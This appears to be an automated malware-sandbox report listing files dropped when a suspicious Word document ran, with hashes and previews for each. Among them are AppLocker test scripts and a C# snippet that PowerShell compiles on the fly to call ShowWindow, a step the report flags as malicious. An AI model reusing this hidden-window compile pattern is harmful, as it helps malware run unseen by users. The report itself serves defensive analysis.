                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1l1ukna2.yie.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2rsltu31.yvk.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3th3d21m.lov.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_45xtaxnq.z00.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5fn1a2i5.3lf.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cihkzaai.zl0.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gwdpudhv.fs3.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qwnn0mg5.rms.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rjri2an0.j5c.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s1zferiw.nxl.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ypf5dz0i.dua.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z2usowa5.dqk.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zq43swch.ajz.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\t1fagedb\CSC5EF4F498469D4A7EB6829710C89A123D.TMP

                                                                                    Download File
                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                    File Type:MSVC .res
                                                                                    Category:dropped
                                                                                    Size (bytes):652
                                                                                    Entropy (8bit):3.088806136340238
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grye5ecak7YnqqD5exPN5Dlq5J:+RI+ycuZhNtcakSsxPNnqX
                                                                                    MD5:714910E35B98670F7091D7CFD81B0C85
                                                                                    SHA1:4E1CA3949079FD0C4FFBED90114647CA8B6F3552
                                                                                    SHA-256:0BBE3B416C9A852AC68A417CF7E507159B78A6E462CBF835C7A2BE7BA72A9560
                                                                                    SHA-512:00138B88DE27F33C9CA209D6CC0566B2DDED2D3EF8FB36087AD81EB5D98C1733147ABE41F96E8CDE56644BEAE0C0C964D11ED68C0A547F301C101E5A134E8813
                                                                                    Malicious:false
                                                                                    Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...t.1.f.a.g.e.d.b...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...t.1.f.a.g.e.d.b...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                    C:\Users\user\AppData\Local\Temp\t1fagedb\t1fagedb.0.cs

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):244
                                                                                    Entropy (8bit):4.952945910145069
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:V/DssSuVY/so68SRvoSoODnso68SRaqK4Li:V/D9PY/REvoOnREfe
                                                                                    MD5:6E7BC02C23E28738F9898185137720DB
                                                                                    SHA1:F0450E92B0D01C2A0D23DEF93299FFD1512FAB46
                                                                                    SHA-256:80A682DC3D4FEF7A23471B441BBA682648D7373DEB9889E0017E3BBBA43754E7
                                                                                    SHA-512:FF24CEDAD3619B0D2379F668A06CE36A5DAFF2EBC2B11FCF8BD960C3272D99F5F77EDCA893701A6232DC9EB07794C8D2ABC3FD802CE7E5638EE87291DE1AAEFB
                                                                                    Malicious:false
                                                                                    Preview:.using System; using System.Runtime.InteropServices; public class Win32 { [DllImport("user32.dll")] public static extern int ShowWindow(IntPtr hWnd, int nCmdShow); [DllImport("user32.dll")] public static extern IntPtr GetForegroundWindow(); }

                                                                                    C:\Users\user\AppData\Local\Temp\t1fagedb\t1fagedb.cmdline

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):371
                                                                                    Entropy (8bit):5.198162756629128
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2KJjq23fwPrTzxs7+AEszIKJjq23fwPrcyA:p37Lvkmb6K9F4PrTWZEYF4PrO
                                                                                    MD5:4C4E18F3D0F7E03BCB4414EC8AE7DEB6
                                                                                    SHA1:B1477B22BD8DC8730A49B8A6093B818AB5DE0A93
                                                                                    SHA-256:D2A70067621C367C95D1C5E9E0E8EA425827F597FC7F045601F7C0E166D585BE
                                                                                    SHA-512:3B53EB6EB2F221C15F89EFB04A763BA6E1E7071CCE0C36BE320A116D69304D86CA0F64C94CFACB61BE35B369D0CD52ACABE173E8EFBD16412F7E48B3A41B454C
                                                                                    Malicious:true
                                                                                    Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\t1fagedb\t1fagedb.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\t1fagedb\t1fagedb.0.cs"

                                                                                    C:\Users\user\AppData\Local\Temp\t1fagedb\t1fagedb.dll

                                                                                    Download File
                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):3072
                                                                                    Entropy (8bit):2.788633855212726
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:etGSKJ2JJi8R86QMBTOetkZfREZMn3+WI+ycuZhNtcakSsxPNnqI:6JNR9ZORJREen3l1ulKa3eqI
                                                                                    MD5:94DED5B78D71E09924A590DB91E1C45D
                                                                                    SHA1:CA16F3DC7E1D149A41A09458873A4AADB21A8D35
                                                                                    SHA-256:7DBC2F23131983EAB93C07CBA6043E032737577C388EA252074401F28DBA5325
                                                                                    SHA-512:90E91AFDEF1968149512F96D4F03FFF7B647F2E8609FEBCCF2602D5BF18BAA3A29C5A73C6D38B409FC24ABB6455FD43DBB3B5F69F47A2A3E4B70C3C073D72F6F
                                                                                    Malicious:false
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....-g...........!.................#... ...@....... ....................................@.................................P#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................-.&.....g.....g.......................................... 4............ ?.....P ......S.........Y.....^...S.....S...!.S.....S.......".....+.......4.......?..................................................<Module

                                                                                    C:\Users\user\AppData\Local\Temp\t1fagedb\t1fagedb.out

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (451), with CRLF, CR line terminators
                                                                                    Category:modified
                                                                                    Size (bytes):872
                                                                                    Entropy (8bit):5.3115220328026185
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:KhId3ka6Kn+rgE++rvKax5DqBVKVrdFAMBJTH:ykka6C+ME++DK2DcVKdBJj
                                                                                    MD5:7FE29A0785A2C814D13B762E03456D64
                                                                                    SHA1:DCF4FE0B3E46020789358EB2B1BCD234B4D7D4FF
                                                                                    SHA-256:7AED8E640B8B1D86190B13290D6286FF8B164168A8C7734A89BC8F945B89157D
                                                                                    SHA-512:29110561B038F27A08965C310E727130908BDBD8B1AA933B979DCF8D0BB016BF09064EBD1AEB26C417AF79657811BA70D0EF5B28278A03E67F907820F2099B2E
                                                                                    Malicious:false
                                                                                    Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\t1fagedb\t1fagedb.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\t1fagedb\t1fagedb.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                    C:\Users\user\AppData\Local\Temp\~$eting-Registration.pdf.docx

                                                                                    Download File
                                                                                    Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):162
                                                                                    Entropy (8bit):2.4760628036575962
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:LFQualrlwqn/tQXllfl2tll8hU+Ik/Kh0sll/b:2ualrlbn/i1uXahIk/ob
                                                                                    MD5:DECF600A061B3D218169335DF119DA55
                                                                                    SHA1:5D48CEB33F5E2E1AAB05C32C2BA105571C6A3857
                                                                                    SHA-256:D609DE5998BCF393D9AEE79D5A1A3F1AC5113FBC97CE3E2E5C848B08845B7B61
                                                                                    SHA-512:C1972A97797A51EA8784B2C657478A7917403A7D2CF618CB4A0B1B33D7FBACFC72812AC5647ACDE3E410ED86301BB5063F66DCEC838E9ED2506D2055ABCA6BB4
                                                                                    Malicious:false
                                                                                    Preview:..........................................................D....h5.............8..6.....y.D....5.......................5.......Y...1...t..Q...d8...1...........G!.

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\MSO2057.acl

                                                                                    Download File
                                                                                    Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):37740
                                                                                    Entropy (8bit):3.124668458702961
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:tatNbFeZKdogeyHMOeYhIVi+iOFOqbPXdEmawb:o/eLAhIVJbf
                                                                                    MD5:1FDBC5D1052732C0C3AD24F48E05D9E1
                                                                                    SHA1:50082F5D8196A9FB5DA82659DC32602D07EF9E01
                                                                                    SHA-256:B7DF4E0F7CF8181BE12AB969AB139EEA8A6ACB5976FA20430CD64833CD350DC5
                                                                                    SHA-512:CCCEA5B45D4DF7FC508B4484D3D3F0F0BE0179FE00BE9A55F32A689FCC087174362EFF090FD5F8D0C95180A115847991D7B28C2961F2A2865C02555D00425438
                                                                                    Malicious:false
                                                                                    Preview:....Y...l.......S.....(.c.)...........(.e.)...... ....(.r.)...........(.t.m.)....."!..............& ....a.b.b.o.u.t.....a.b.o.u.t.....a.b.o.t.u.....a.b.o.u.t.....a.b.o.u.t.a.....a.b.o.u.t. .a.....a.b.o.u.t.i.t.....a.b.o.u.t. .i.t.....a.b.o.u.t.t.h.e.....a.b.o.u.t. .t.h.e.....a.b.s.c.e.n.c.e.....a.b.s.e.n.c.e.....a.c.c.e.s.o.r.i.e.s.....a.c.c.e.s.s.o.r.i.e.s.....a.c.c.i.d.a.n.t.....a.c.c.i.d.e.n.t.....a.c.c.o.m.o.d.a.t.e.....a.c.c.o.m.m.o.d.a.t.e.....a.c.c.o.r.d.i.n.g.t.o.....a.c.c.o.r.d.i.n.g. .t.o.....a.c.c.r.o.s.s.....a.c.r.o.s.s.....a.c.h.e.i.v.e.....a.c.h.i.e.v.e.....a.c.h.e.i.v.e.d.....a.c.h.i.e.v.e.d.....a.c.h.e.i.v.i.n.g.....a.c.h.i.e.v.i.n.g.....a.c.n.....c.a.n.....a.c.o.m.m.o.d.a.t.e.....a.c.c.o.m.m.o.d.a.t.e.....a.c.o.m.o.d.a.t.e.....a.c.c.o.m.m.o.d.a.t.e.....a.c.t.u.a.l.y.l.....a.c.t.u.a.l.l.y.....a.d.d.i.t.i.n.a.l.....a.d.d.i.t.i.o.n.a.l.....a.d.d.t.i.o.n.a.l.....a.d.d.i.t.i.o.n.a.l.....a.d.e.q.u.i.t.....a.d.e.q.u.a.t.e.....a.d.e.q.u.i.t.e.....a.d.e.q.u.a.t.e.....a.d.n.....

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

                                                                                    Download File
                                                                                    Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):18
                                                                                    Entropy (8bit):2.836591668108979
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:QhRZln:Qb
                                                                                    MD5:C635A6BFA5AE32F7E77689DF0465FC21
                                                                                    SHA1:AFF2FB5D3D3DBB371C3EDAA867AA0FB4FD4D8B06
                                                                                    SHA-256:75EB61906ED4248E5CB1C7A09A2031E5C159A52577A5625766612370E508D535
                                                                                    SHA-512:A1BBCCBBD6B849070F3981710E1D1F0882C78C2947781908ACAF987FC2F3E34C8DB981212B47C9D714568E4F8D91D938056329787121EE9397D7086F8A57855A
                                                                                    Malicious:false
                                                                                    Preview:..D.y.l.a.n.e.....

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

                                                                                    Download File
                                                                                    Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):2
                                                                                    Entropy (8bit):1.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Qn:Qn
                                                                                    MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                    Malicious:false
                                                                                    Preview:..

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN3c09.lex

                                                                                    Download File
                                                                                    Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):2
                                                                                    Entropy (8bit):1.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Qn:Qn
                                                                                    MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                    Malicious:false
                                                                                    Preview:..

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\26XQ0G9BB0T6HV50BFKX.temp

                                                                                    Download File
                                                                                    Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:modified
                                                                                    Size (bytes):12
                                                                                    Entropy (8bit):0.41381685030363374
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:/l:
                                                                                    MD5:E4A1661C2C886EBB688DEC494532431C
                                                                                    SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                                                                    SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                                                                    SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                                                                    Malicious:false
                                                                                    Preview:............

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):6222
                                                                                    Entropy (8bit):3.7201496262137024
                                                                                    Encrypted:false
